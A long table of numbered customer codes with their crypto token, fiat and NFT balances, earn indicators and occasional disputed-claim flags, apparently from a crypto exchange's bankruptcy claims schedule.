| 07370595 | | CUSDT[4], DOGE[74.75649324], TRX[1], USD[0.00] | | |
| 07370596 | | USD[11.02] | Yes | |
| 07370597 | | BAT[1], BRZ[1], CUSDT[7], GRT[1], TRX[3], USD[0.01] | | |
| 07370599 | | BRZ[0], CUSDT[1.00033067], DOGE[45.84438686], SUSHI[0], USD[0.00], USDT[0] | | |
| 07370600 | | CUSDT[1], ETH[.00553378], ETHW[.00553378], USD[1.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07370601 | Contingent, Disputed | BTC[0], LTC[0], USD[0.02] | | |
| 07370604 | | DOGE[15.91292852], USD[0.00] | | |
| 07370606 | | CUSDT[1], ETH[0], USD[0.00] | | |
| 07370607 | | DOGE[20.86529984], USD[0.00] | | |
| 07370608 | | CUSDT[1], DOGE[3822.35807919], TRX[517.27525584], USD[0.00] | Yes | |
| 07370609 | | USD[10.00] | | |
| 07370611 | | BRZ[1], DOGE[4709.04406772], TRX[1], USD[12.10] | | |
| 07370613 | | DOGE[20925.15956726], LTC[4.41610289], TRX[786.62781404], USD[0.02] | | |
| 07370614 | | USD[10.00] | | |
| 07370615 | | BTC[0], ETH[0], GRT[0], LINK[0], USD[7.12], WBTC[0] | | |
| 07370616 | | USD[10.00] | | |
| 07370617 | | USD[10.00] | | |
| 07370618 | | USD[10.00] | | |
| 07370619 | | USD[10.00] | | |
| 07370620 | | AVAX[90.35484089], BF_POINT[300], BTC[0.31983412], DOGE[15943.48159735], ETH[2.82815969], ETHW[2.82717917], GRT[503.87850981], MATIC[380.31588962], NEAR[381.87569854], SHIB[3667471.21805451], SOL[88.90070858], SUSHI[292.42281262], TRX[44], USD[0.00], USDT[0], YFI.05327393] | Yes | |
| 07370621 | | CUSDT[1], TRX[241.69951975], USD[0.00] | Yes | |
| 07370622 | | TRX[2], USD[0.00] | | |
| 07370624 | | USD[10.00] | | |
| 07370625 | | USD[10.00] | | |
| 07370627 | | USD[10.00] | | |
| 07370628 | | BTC[.00521154], ETH[.000047], ETHW[.000047], GRT[.376], LINK[1421.8767], SOL[.01284], USD[0.00], YFI[.000847] | | |
| 07370629 | | USD[10.00] | | |
| 07370630 | | USD[10.00] | | |
| 07370631 | | USD[10.00] | | |
| 07370636 | | CUSDT[4], DOGE[2], SHIB[2], TRX[2], USD[0.00] | Yes | |
| 07370637 | | BTC[0], ETH[0], LINK[.00000001], SOL[0], USD[0.02], USDT[0.00008118] | | |
| 07370639 | | USD[10.00] | | |
| 07370640 | | USD[0.00] | | |
| 07370642 | | DOGE[0], KSHIB[0], SHIB[0], USD[1.56] | Yes | |
| 07370645 | | CUSDT[2], DOGE[.00000155], ETH[.00527561], ETHW[.00527561], USD[0.00] | | |
| 07370646 | | USD[0.00] | | |
| 07370648 | | USD[10.00] | | |
| 07370649 | | USD[10.00] | | |
| 07370650 | | BAT[.99676392], CUSDT[5], DOGE[694.79188433], ETH[.00570774], ETHW[.00563934], TRX[1], UNI[1.118795], USD[0.00] | Yes | |
| 07370652 | | USD[20.00] | | |
| 07370653 | | BAT[0.02133423], DOGE[0], GRT[0], TRX[0], USD[0.01] | | |
| 07370654 | | ETH[.00390188], ETHW[.00384716], USD[0.00] | Yes | |
| 07370655 | | BAT[1], CUSDT[5], TRX[1], USD[0.01] | | |
| 07370656 | | USD[0.00] | | |
| 07370657 | | USD[10.00] | | |
| 07370658 | | BTC[.00120264], CUSDT[1], DOGE[45.8013022], SUSHI[.49302216], USD[0.00] | | |
| 07370659 | | CUSDT[4], TRX[1], USD[0.01] | | |
| 07370661 | | LTC[.00059197], USD[0.00] | | |
| 07370662 | | USD[0.01] | Yes | |
| 07370663 | | BTC[0] | | |
| 07370664 | | USD[10.00] | | |
| 07370666 | | DOGE[1], ETH[0], USD[0.00] | | |
| 07370667 | | USD[10.00] | | |
| 07370668 | | USD[10.00] | | |
| 07370669 | | DOGE[7925.997], USD[0.08] | | |
| 07370670 | | BTC[0], DOGE[0], ETH[0], ETHW[0], SOL[0], USD[0.00], USDT[0] | | |
| 07370671 | | USD[10.00] | | |
| 07370672 | | USD[10.00] | | |
| 07370673 | | USD[10.00] | | |
| 07370674 | | ETH[-0.00000001], SOL[.0000001], USD[0.12] | | |
| 07370677 | | USD[10.00] | | |
| 07370678 | | DOGE[143.07153148], ETH[0], ETHW[0], USD[0.00] | Yes | |
| 07370679 | | DOGE[2], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07370681 | | BTC[0], DOGE[0], TRX[2], USD[10.00], USDT[1] | | |
| 07370682 | Contingent, Disputed | BAT[0], BRZ[0], BTC[0], ETH[0], TRX[0], UNI[0], USD[208.51], USDT[0.00000001] | | |
| 07370683 | | BTC[.00002888], SOL[0], USD[0.71], USDT[0] | | |
| 07370686 | | DOGE[133.03687396], USD[0.00] | | |
| 07370687 | | USD[10.00] | | |
| 07370688 | | BTC[0], GRT[17.9829], LTC[.00712438], SUSHI[.2175], USD[1.72] | | |
| 07370689 | | USD[10.00] | | |
| 07370690 | | BAT[1543.106], BTC[0.03137100], ETH[1.124432], ETHW[1.124432], TRX[1227.771], USD[3.08], USDT[3.32300000] | | |
| 07370691 | | BRZ[0], BTC[0], DOGE[0], USD[0.00] | Yes | |
| 07370692 | | USD[10.91] | Yes | |
| 07370693 | | BRZ[1], CUSDT[1], DOGE[0], ETH[0], TRX[2], USD[0.00] | | |
| 07370694 | | BAT[0], BTC[0.00232263], DOGE[0], ETH[0.00000057], ETHW[0.00000057], LTC[0], SOL[0], TRX[0], USD[0.00], USDT[0], YFI[0] | Yes | |
| 07370695 | | AVAX[0], BTC[0], DOGE[0.32058883], ETH[0], ETHW[0.29978579], MATIC[0], NFT (550684966886757946/Entrance Voucher #3329)[1], SOL[0], USD[0.00], USDT[0] | | |
| 07370696 | | USD[10.00] | | |
| 07370698 | | USD[0.00] | | |
| 07370699 | | USD[10.00] | | |
| 07370702 | | USD[10.00] | | |
| 07370703 | | BRZ[0], BTC[0], CUSDT[5], DOGE[1], ETH[0], GRT[0], KSHIB[0], LTC[0], MATIC[0], MKR[0], SOL[0], SUSHI[0], TRX[2], USD[0.01], USDT[0] | Yes | |
| 07370706 | | USD[10.00] | | |
| 07370707 | | USD[10.00] | | |
| 07370708 | | USD[10.00] | | |
| 07370709 | | USD[10.00] | | |
| 07370710 | | BCH[0], BTC[0], DOGE[0], ETH[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.01] | | |
| 07370711 | | USD[10.00] | | |
| 07370712 | | BRZ[1], CUSDT[3], DOGE[889.74318195], TRX[1], USD[200.71] | | |
| 07370713 | | USD[10.00] | | |
| 07370714 | | USD[10.80] | Yes | |
| 07370715 | | USD[0.00] | | |
| 07370717 | | USD[10.00] | | |
| 07370719 | | BTC[0], ETH[.00000001], ETHW[1.00022933], USD[0.23], USDT[0.34134602] | | |
| 07370720 | | BTC[0], ETH[.00000001], ETHW[0], SOL[0], USD[0.00], USDT[0.00000065] | | |
| 07370721 | | DOGE[19.12980273], GBP[0.00], USD[0.00] | | |
| 07370722 | | SOL[0], USD[5.34] | | |
| 07370723 | | BTC[0.00297901], CUSDT[2], DOGE[1489.79293977], USD[0.00] | | |
| 07370724 | | BRZ[1], BTC[.01244346], CUSDT[2], DOGE[749.3282536], USD[0.00] | | |
| 07370725 | | USD[0.01], USDT[0] | | |
| 07370726 | | BAT[1], CUSDT[4], DOGE[6001.46199434], LINK[13.48041868], SUSHI[74.53237986], TRX[24766.36161893], USD[10.00] | | |
| 07370727 | | CUSDT[4], DOGE[1.49737034], SHIB[5218.78763548], TRX[4], USD[0.01] | | |
| 07370729 | | USD[0.00] | Yes | |
| 07370730 | | UNI[1] | | |
| 07370731 | | BCH[0], BTC[0.00016881], DOGE[0], ETH[0.37395526], ETHW[0.37379837], SHIB[11715592.25842663], TRX[3], USD[0.01], USDT[0] | Yes | |
| 07370735 | | BRZ[0], DOGE[0], ETH[0], USD[0.00] | | |
| 07370736 | | DOGE[.352], GRT[.05614445], TRX[.000003], USD[0.13], USDT[0.00000001] | | |
| 07370737 | | BTC[0], DOGE[1], ETH[0], LTC[0], SOL[0], TRX[1], USD[0.00] | | |
| 07370739 | | DOGE[1], USD[0.00] | | |
| 07370740 | | USD[10.00] | | |
| 07370741 | | CUSDT[1], DOGE[136.39170825], ETH[.00005696], ETHW[.00005696], GRT[1], TRX[2], USD[0.00] | | |
| 07370742 | | DAI[0], DOGE[0], USD[0.00], USDT[0.00000107] | | |
| 07370743 | | CUSDT[1], DOGE[2], USD[10.00] | | |
| 07370744 | | CUSDT[2], DOGE[1], USD[0.00] | | |
| 07370745 | | BTC[.00019741], USD[0.00] | | |
| 07370747 | | DOGE[121.31058129], USD[0.00] | | |
| 07370748 | | USD[10.00] | | |
| 07370749 | | BAT[4393.95033769], BRZ[1], GRT[1.00498619], SUSHI[1.10381534], TRX[42739.85335647], USD[0.64], USDT[1.10412782] | Yes | |
| 07370751 | | USD[10.00] | | |
| 07370752 | | BAT[.69285229], BRZ[3298636], CUSDT[12], DAI[.73415671], DOGE[.41137732], GRT[.57477807], LINK[.00714448], SOL[.03520763], SUSHI[.22516113], TRX[22.02960181], USD[2.54], USDT[0.01539873] | | |
| 07370753 | | USD[10.00] | | |
| 07370754 | | BRZ[1], CUSDT[5], USD[0.01], USDT[0] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07370755 | | USD[10.00] | | |
| 07370758 | | USD[10.00] | | |
| 07370759 | | BRZ[1], BTC[.00574081], CUSDT[1], DOGE[239.66285897], ETH[.03888588], ETHW[.03888588], SHIB[1], TRX[1], USD[0.00] | | |
| 07370761 | | TRX[185.1732175], USD[0.00] | | |
| 07370763 | | GRT[0], SGD[0.01], USD[5.93], USDT[0] | | |
| 07370764 | | BTC[0], DAI[.00000001], ETH[0.00000001], ETHW[0], MATIC[1.74423971], SOL[0.00385716], UNI[0], USD[127.30], USDT[0.00000002], WBTC[.0000772] | Yes | |
| 07370765 | | DOGE[0.57466533], USD[0.97] | | |
| 07370766 | | USD[10.00] | | |
| 07370767 | | BTC[.00022091], DOGE[2], ETH[.18721274], ETHW[.18721274], LTC[1.00442726], SHIB[1], TRX[1], USD[0.01] | | |
| 07370768 | | BAT[169], BTC[0.22121431], ETH[1.91525616], ETHW[1.91525616], NFT (3651123039196371211/Coachella x FTX Weekend 2 #19273)[1], SHIB[4491000], USD[0.01] | | |
| 07370769 | | SHIB[601.60453709], USD[0.00] | | |
| 07370770 | | CUSDT[1], DOGE[1698.98533198], USD[110.00] | | |
| 07370771 | | DOGE[1], USD[0.01] | | |
| 07370772 | | USD[10.69] | Yes | |
| 07370774 | | DOGE[0], USD[0.00], USDT[0] | Yes | |
| 07370775 | | DOGE[305.01995037], USD[0.00] | | |
| 07370776 | | BTC[0.00000037], DOGE[46.81765710], ETH[0], USD[0.00], USDT[0] | | |
| 07370777 | | USD[10.00] | | |
| 07370778 | | BF_POINT[200], CUSDT[5], TRX[652.30426512], USD[3.18], USDT[1.08157651] | Yes | |
| 07370779 | | DOGE[62.48966687], TRX[1], USD[0.01] | | |
| 07370780 | | DOGE[169.38581719], TRX[1], USD[0.00] | | |
| 07370781 | | USD[10.00] | | |
| 07370782 | | DOGE[.433], SUSHI[.442], USD[0.94], USDT[.197353] | | |
| 07370783 | | USD[10.00] | | |
| 07370786 | | DOGE[230.90136014], USD[0.00] | | |
| 07370787 | | CUSDT[3], DOGE[142.55018646], TRX[1], USD[0.08] | | |
| 07370788 | | USD[10.00] | | |
| 07370789 | | BTC[0, DOGE[8.2225], USD[0.24] | | |
| 07370794 | | USD[10.00] | | |
| 07370795 | | BAT[1], BRZ[1], DOGE[1], GRT[1], SOL[364.74750026], TRX[3], USD[10595.10], USDT[2] | | |
| 07370796 | | USD[10.00] | | |
| 07370797 | | USD[10.09] | Yes | |
| 07370798 | | BRZ[1], CUSDT[3], DOGE[1], ETH[.00000001], SHIB[1], TRX[2], USD[0.00] | Yes | |
| 07370803 | | USD[10.00] | | |
| 07370804 | | CUSDT[2], DOGE[41.15482133], USD[0.00] | | |
| 07370805 | | USD[10.00] | | |
| 07370809 | | BRZ[0], BTC[0], DOGE[0], ETH[0], TRX[0], USD[0.00], USDT[0] | | |
| 07370810 | | USD[10.00] | | |
| 07370811 | | BRZ[1], CUSDT[4], DOGE[373.29583876], TRX[1], USD[0.00] | | |
| 07370812 | | SHIB[1], USD[0.00], USDT[0] | | |
| 07370813 | | USD[10.00] | | |
| 07370814 | | USD[10.00] | | |
| 07370815 | | USD[10.00] | | |
| 07370817 | | USD[0.01] | | |
| 07370818 | | BAT[0], BCH[0], BRZ[0.00000130], BTC[0], CUSDT[.00002399], DOGE[0], ETH[0], GRT[0], LINK[0], LTC[0], SUSHI[0], USD[0.33], USDT[0.00000001], YFI[0] | | |
| 07370819 | | USD[10.00] | | |
| 07370820 | | USD[0.00] | | |
| 07370821 | | USD[10.00] | | |
| 07370822 | | BRZ[2], CUSDT[26], DOGE[0.00831862], ETH[0], SOL[0], TRX[7.11752836], USD[0.00], USDT[0], YFI[0] | Yes | |
| 07370823 | | USD[0.00] | Yes | |
| 07370824 | | USD[10.00] | | |
| 07370826 | | USD[10.00] | | |
| 07370827 | | CUSDT[5], DOGE[3447.23610519], ETH[.12181612], ETHW[.12064605], LINK[1.26001744], LTC[.24329858], TRX[1], USD[0.00] | Yes | |
| 07370828 | | USD[10.00] | | |
| 07370829 | | DAI[10.46649], USD[0.00] | Yes | |
| 07370831 | | USD[0.00] | | |
| 07370833 | | USD[10.00] | | |
| 07370834 | | DOGE[0], ETH[0], SOL[0], TRX[0], UNI[0], USD[0.01], USDT[0] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07370835 | | USD[0.00] | | |
| 07370836 | | USD[10.00] | | |
| 07370837 | | BRZ[1], DOGE[.03488417], ETH[.00001161], ETHW[1.28177525], MATIC[.00181137], SHIB[2], SOL[0], TRX[.01314766], USD[10.09] | Yes | |
| 07370838 | | BAT[0], BCH[0], CUSDT[12], DOGE[0], LINK[0], LTC[0], PAXG[0], SOL[0], TRX[0], UNI[0], USD[0.00] | Yes | |
| 07370840 | | USD[60.00] | | |
| 07370841 | | GRT[.18273846], USD[0.01], USDT[0] | | |
| 07370842 | | BTC[0], DOGE[1], ETH[0], TRX[0], USD[0.00] | | |
| 07370843 | | USD[10.00] | | |
| 07370844 | | USD[10.00] | | |
| 07370845 | | CUSDT[1], DOGE[23.81497585], USD[0.00] | Yes | |
| 07370846 | | USD[10.00] | | |
| 07370847 | | USD[10.00] | | |
| 07370848 | | USD[10.00] | | |
| 07370850 | | CUSDT[1], DOGE[.0000064], USD[0.01] | | |
| 07370851 | | USD[0.43] | | |
| 07370852 | | DOGE[148.00111178], USD[0.00] | | |
| 07370856 | | USD[10.95] | Yes | |
| 07370858 | | BTC[0], DOGE[1], SOL[0], USD[10.04] | | |
| 07370859 | | BTC[0], DOGE[0], USD[0.00] | | |
| 07370860 | | USD[10.00] | | |
| 07370861 | | BTC[0.00227858], DOGE[.46737232], GRT[0], MATIC[0], USD[0.00], USDT[0.00000001] | Yes | |
| 07370862 | | USD[20.00] | | |
| 07370863 | | BRZ[1], TRX[1], USD[0.01] | | |
| 07370864 | | USD[10.00] | | |
| 07370865 | | BRZ[1], CUSDT[6], SOL[.32294461], TRX[38.25260796], USD[0.00] | Yes | |
| 07370866 | | USD[10.00] | | |
| 07370867 | | USD[10.00] | | |
| 07370868 | | USD[10.00] | | |
| 07370869 | | USD[10.00] | | |
| 07370870 | | DOGE[144.19856026], USD[0.00] | | |
| 07370871 | | USD[10.00] | | |
| 07370872 | | USD[10.00] | | |
| 07370873 | | USD[10.00] | | |
| 07370874 | | BTC[.01427302], ETH[.563436], ETHW[.563436], TRX[5084.91], USD[6.33] | | |
| 07370875 | | USD[10.00] | | |
| 07370876 | | USD[10.00] | | |
| 07370877 | | SHIB[3400000], USD[1.42] | | |
| 07370879 | | USD[10.00] | | |
| 07370880 | | USD[10.00] | | |
| 07370881 | | BAT[0], BTC[0], CUSDT[1], DOGE[1], ETH[0], TRX[1], USD[0.00], USDT[0.00000011] | | |
| 07370882 | | BAT[1], CUSDT[2], USD[9.88] | | |
| 07370883 | | USD[10.00] | | |
| 07370884 | | USD[10.00] | | |
| 07370885 | | USD[10.00] | | |
| 07370886 | | USD[10.00] | | |
| 07370887 | | CUSDT[12], DOGE[0], USD[0.01] | | |
| 07370888 | | BAT[14.66611236], BCH[.01886592], BRZ[3], BTC[.03204848], CUSDT[12], DOGE[2405.79840868], ETH[.26693676], ETHW[.26674156], GRT[1.00404471], LINK[16.30733762], NFT [377]0247101449207/1/Starry Night )[1], SHIB[10007400.94922657], SOL[4.50865656], SUSHI[1.38690062], TRX[3], USD[0.00] | Yes | |
| 07370889 | | BTC[.05653371], CUSDT[5], DOGE[793.03565849], ETH[.15396024], ETHW[.15322165], SHIB[36376117.58527759], TRX[5], UNI[1.10879961], USD[0.00] | Yes | |
| 07370890 | | USD[0.00] | | |
| 07370891 | | USD[10.00] | | |
| 07370892 | | BRZ[7], CUSDT[31], TRX[1], USD[0.00], USDT[0] | | |
| 07370893 | | USD[10.00] | | |
| 07370895 | | CUSDT[1], GRT[302.25144022], USD[10.00] | | |
| 07370898 | | BAT[18.48357702], CUSDT[1], USD[0.00] | | |
| 07370900 | | BTC[0], CUSDT[2], DAI[.00817832], DOGE[1], ETH[0], TRX[0], USD[0.00], USDT[0] | | |
| 07370901 | | BRZ[1], DOGE[2], TRX[1], USD[0.00], USDT[0.00001503] | | |
| 07370903 | | USD[0.01], USDT[0] | | |
| 07370904 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07370905 | | BRZ[2], CUSDT[5], DOGE[248.20129601], ETH[.11400855], ETHW[.11400855], TRX[2], USD[0.01] | | |
| 07370906 | | DOGE[0], GRT[0], SOL[0], SUSHI[0], TRX[2.00035822], USD[0.00] | | |
| 07370907 | | BRZ[2], CUSDT[2], DOGE[.00077553], USD[0.00] | | |
| 07370908 | | USD[0.02] | | |
| 07370910 | | CUSDT[1], DOGE[2300.26246481], GRT[48.77216789], LINK[10.52297538], SUSHI[15.51473715], TRX[1], USD[0.00] | Yes | |
| 07370913 | | TRX[112.42900389], USD[0.00] | | |
| 07370915 | | CUSDT[3], DOGE[1], USD[159.90] | | |
| 07370916 | | USD[10.00] | | |
| 07370918 | | USD[10.00] | | |
| 07370919 | | USD[11.06] | Yes | |
| 07370920 | | CUSDT[49.91467955], DOGE[0], ETH[0], LINK[1.14961984], TRX[2], USD[0.00], USDT[0] | | |
| 07370921 | | USD[10.00] | | |
| 07370922 | | USD[10.00] | | |
| 07370923 | | USD[10.00] | | |
| 07370925 | | USD[10.00] | | |
| 07370926 | | ALGO[0], BTC[0], DOGE[0], ETH[0], ETHW[0], LTC[0], SUSHI[0], USD[0.01], YFI[0] | Yes | |
| 07370927 | | USD[10.00] | | |
| 07370928 | | USD[10.00] | | |
| 07370929 | | BRZ[1], CUSDT[9], KSHIB[143.71428003], USD[0.28] | Yes | |
| 07370930 | | CUSDT[1], USD[17.28] | | |
| 07370931 | | USD[10.00] | | |
| 07370932 | | USD[10.00] | | |
| 07370933 | | BTC[0], USD[0.00] | Yes | |
| 07370934 | | CUSDT[2], DOGE[53.11466551], TRX[2], USD[0.01] | | |
| 07370935 | | LTC[.05229635], USD[1000.00] | | |
| 07370936 | | USD[149.76] | | |
| 07370937 | | USD[10.00] | | |
| 07370938 | | CUSDT[6], DOGE[25.10384011], SOL[1.0593884], USD[0.00] | | |
| 07370939 | | DOGE[1], USD[0.00] | Yes | |
| 07370940 | | BRZ[5], CUSDT[59], DOGE[13777.09589187], ETH[.25832348], ETHW[.25832348], GRT[1234.39489814], SHIB[5], TRX[2474.6167834], USD[0.24] | | |
| 07370941 | | USD[10.00] | | |
| 07370943 | | USD[10.00] | | |
| 07370945 | | USD[10.00] | | |
| 07370946 | | CUSDT[468.33647352], USD[0.00] | | |
| 07370948 | | USD[10.00] | | |
| 07370950 | | GRT[9.91443259], USD[0.00] | | |
| 07370951 | | BAT[1], DOGE[1], TRX[2], USD[0.01] | | |
| 07370952 | | USD[10.00] | | |
| 07370953 | | USD[10.00] | | |
| 07370954 | | USD[10.92] | Yes | |
| 07370955 | | USD[10.00] | | |
| 07370956 | | CUSDT[1], TRX[1], USD[0.00] | | |
| 07370957 | | USD[26.39], WBTC[.00001277] | | |
| 07370958 | | TRX[205.34089537], USD[0.00] | | |
| 07370959 | | USD[10.00] | | |
| 07370960 | | USD[11.05] | Yes | |
| 07370961 | | USD[10.00] | | |
| 07370962 | | BRZ[2], CUSDT[7], SHIB[2], SOL[.20126838], TRX[6], USD[0.00] | | |
| 07370964 | | AAVE[4.63315954], BF_POINT[200], BRZ[1], BTC[0], CUSDT[3], DOGE[4], ETHW[0.16637720], MATIC[0], SHIB[12], TRX[3], USD[0.00] | Yes | |
| 07370965 | | ETH[0.00288273], ETHW[0.08000000], USD[0.00], USDT[0.00001797] | | |
| 07370966 | | USD[10.00] | | |
| 07370967 | | USD[10.00] | | |
| 07370968 | | BRZ[1], CUSDT[3], USD[0.01], USDT[0] | | |
| 07370969 | | USD[10.00] | | |
| 07370972 | | NFT (549749905680366465/FTX Crypto Cup 2022 Key #2966)[1], USD[10.00] | | |
| 07370973 | | USD[10.00] | | |
| 07370974 | | BRZ[2], CUSDT[2574.30491687], DOGE[2807.68651435], ETH[.04273406], ETHW[.04220054], KSHIB[1843.46758083], TRX[6], USD[0.00] | Yes | |
| 07370975 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07370976 | | CUSDT[1], DOGE[409.7839285], ETH[.03960163], ETHW[.03960163], TRX[1], USD[0.00] | | |
| 07370977 | | USD[10.00] | | |
| 07370978 | | BCH[0], USD[0.81] | Yes | |
| 07370979 | | BRZ[6.5079464], CUSDT[29], DAI[.00000001], DOGE[5.10574527], GRT[990.90443594], KSHIB[2745.81717010], MATIC[211.56409341], SHIB[13272888.15555477], SOL[45.47035262], TRX[1], USD[0.00], USDT[0.00000001] | Yes | |
| 07370980 | | USD[10.00] | | |
| 07370981 | | USD[10.00] | | |
| 07370982 | | USD[10.00] | | |
| 07370983 | | USD[10.00] | | |
| 07370984 | | USD[10.00] | | |
| 07370986 | | USD[10.00] | | |
| 07370988 | | USD[10.00] | | |
| 07370989 | | USD[10.00] | | |
| 07370990 | | DOGE[1], ETH[.00538119], ETHW[.00538119], USD[0.00] | | |
| 07370991 | | BTC[.00021333], USD[0.00] | | |
| 07370992 | | BTC[.00021672], USD[0.00] | | |
| 07370994 | | BAT[28.33715719], BRZ[1], CUSDT[.00001913], DOGE[434.55252374], GRT[35.19848375], SHIB[1], SOL[9.61971877], SUSHI[19.51480199], TRX[1006.79208814], USD[0.00] | | |
| 07370995 | | USD[60.00] | | |
| 07370996 | | DOGE[157.9099002], USD[10.00] | | |
| 07370999 | | BRZ[3], CUSDT[17], SUSHI[.26796435], USD[0.04] | | |
| 07371001 | | USD[10.00] | | |
| 07371003 | | USD[10.00] | | |
| 07371005 | | TRX[1], USD[0.00] | | |
| 07371006 | | USD[10.00] | | |
| 07371007 | | BAT[.996], BTC[0], DAI[0], DOGE[11.80515834], ETH[0.27116900], ETHW[0.27116900], GRT[0], SHIB[100000], SOL[.00435], TRX[0.51900000], USD[4.41] | | |
| 07371008 | | BCH[0], BRZ[0], BTC[0], ETH[0], LTC[0], TRX[0], USD[0.05], USDT[0] | | |
| 07371010 | | DOGE[1609.78586358], USD[100.00] | | |
| 07371014 | | BTC[0], SOL[0], TRX[0], USD[0.18] | | |
| 07371015 | | USD[10.69] | Yes | |
| 07371016 | | ETH[0], ETHW[0], SOL[0] | | |
| 07371018 | | BTC[.00109114], CUSDT[2], DOGE[18.85768231], SOL[.96446952], USD[0.40] | | |
| 07371020 | | CUSDT[3], DOGE[9], USD[0.00] | | |
| 07371021 | | USD[10.00] | | |
| 07371022 | | DOGE[25.3672049], USD[5.46] | Yes | |
| 07371023 | | BRZ[3], CUSDT[7], DOGE[2], TRX[3], USD[0.01] | | |
| 07371024 | | USD[10.00] | | |
| 07371025 | | USD[10.00] | | |
| 07371026 | | USD[10.00] | | |
| 07371028 | | USD[10.00] | | |
| 07371029 | | TRX[.011145], USD[0.00], USDT[0.00000001] | | |
| 07371030 | | USD[10.00] | | |
| 07371031 | | ETH[.00006723], ETHW[.00006723], USD[0.12] | | |
| 07371032 | | BTC[0], SOL[0], USD[0.00], USDT[0.00110910] | | |
| 07371033 | | USD[0.00] | | |
| 07371034 | | USD[0.00] | | |
| 07371036 | | USD[10.00] | | |
| 07371037 | | CUSDT[492.24912359], USD[0.00] | Yes | |
| 07371038 | | USD[10.00] | | |
| 07371039 | | USD[0.00], USDT[.05663345] | | |
| 07371040 | | USD[10.00] | | |
| 07371041 | | BRZ[1], CUSDT[4], DOGE[0], GRT[0], SOL[0], TRX[5], USD[0.01] | | |
| 07371042 | | BRZ[31], CUSDT[54], DOGE[1], GRT[15], LINK[1], SUSHI[1], TRX[3], USD[30.96], USDT[17.95534345] | | |
| 07371043 | | USD[10.00] | | |
| 07371045 | | GRT[4.18885661], USD[0.00] | | |
| 07371046 | | BAT[154.9071692], CUSDT[2], DOGE[2], TRX[1], USD[0.00] | Yes | |
| 07371048 | | USD[0.00] | | |
| 07371049 | | USD[10.00] | | |
| 07371050 | | USD[10.00] | | |
| 07371051 | | SHIB[122780.42110359], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07371052 | | BAT[1], BRZ[1], BTC[0.00000209], CUSDT[7], DOGE[4], ETH[0], LTC[0], SHIB[2], SOL[0], TRX[1], USD[0.00], USDT[1.00043842] | Yes | |
| 07371053 | | USD[10.00] | | |
| 07371054 | | BTC[0], DOGE[.26873612], ETH[0], SOL[0], SUSHI[0], USD[0.00], USDT[0] | | |
| 07371056 | | USD[10.00] | | |
| 07371057 | | USD[10.00] | | |
| 07371058 | | BTC[0], TRX[1], USD[277.70] | Yes | |
| 07371059 | | USD[10.00] | | |
| 07371060 | | SHIB[3431711.63962953], USD[0.00], USDT[0] | Yes | |
| 07371062 | | USD[10.00] | | |
| 07371063 | | LINK[.30220462], USD[0.00] | | |
| 07371064 | | CUSDT[468.94725093], USD[0.00] | | |
| 07371065 | | USD[10.00] | | |
| 07371066 | | USD[0.05] | | |
| 07371067 | | BTC[0.00035543], CUSDT[9], DOGE[76.26987611], ETH[0.03739537], ETHW[0.03739537], USD[8.87] | | |
| 07371068 | | DOGE[3028], SOL[24.985], TRX[33928], USD[859.52], USDT[2746.35325875] | | |
| 07371071 | | CUSDT[2], DOGE[.4431758], GBP[0.00], GRT[1], TRX[4], USD[0.00], USDT[0] | | |
| 07371072 | | USD[10.00] | | |
| 07371073 | | BAT[16.69215168], CUSDT[1], USD[0.00] | | |
| 07371074 | | CUSDT[2], USD[0.00] | | |
| 07371075 | | USD[10.00] | | |
| 07371076 | | BRZ[1], CUSDT[7.00059415], TRX[14.71549624], USD[1256.88], USDT[0.00001834] | Yes | |
| 07371077 | | USD[10.00] | | |
| 07371079 | | CUSDT[8], KSHIB[.08470789], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07371080 | | TRX[1], USD[0.00] | | |
| 07371081 | | DOGE[3253.36605495], USD[0.33] | | |
| 07371082 | | BCH[0], BTC[0], DOGE[455.90529874], ETH[0], LTC[0], SOL[0], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07371083 | | USD[0.00] | | |
| 07371084 | | ETH[0], SHIB[2], USD[0.00] | | |
| 07371085 | | USD[10.00] | | |
| 07371087 | | USD[10.00] | | |
| 07371089 | | BAT[0], BRZ[0], DOGE[0], GRT[0], PAXG[0], SOL[0.00044259], SUSHI[0], TRX[0], USD[0.00], USDT[0], YFI[0] | | |
| 07371091 | | USD[10.00] | | |
| 07371092 | | USD[10.00] | | |
| 07371093 | | DOGE[26.31833127], USD[0.00] | | |
| 07371094 | | BF_POINT[200], BRZ[1], CUSDT[3], DOGE[2298.26549451], TRX[1], USD[0.00], USDT[1.00146218] | Yes | |
| 07371096 | | USD[10.00] | | |
| 07371100 | | USD[2.50] | | |
| 07371101 | | USD[10.00] | | |
| 07371102 | | USD[10.00] | | |
| 07371103 | | USD[10.00] | | |
| 07371105 | | DOGE[39.02701438], USD[0.00] | | |
| 07371106 | | BAT[1], CUSDT[7], DOGE[1], TRX[2], USD[0.57], USDT[1] | | |
| 07371108 | | CUSDT[1], USD[0.00] | | |
| 07371109 | | USD[10.00] | | |
| 07371110 | | DOGE[0], SOL[0], USD[0.00] | | |
| 07371111 | | BCH[.29457449], CUSDT[4], DOGE[919.98872756], KSHIB[3145.40307720], SOL[5.27584364], TRX[3], USD[0.01], USDT[0] | | |
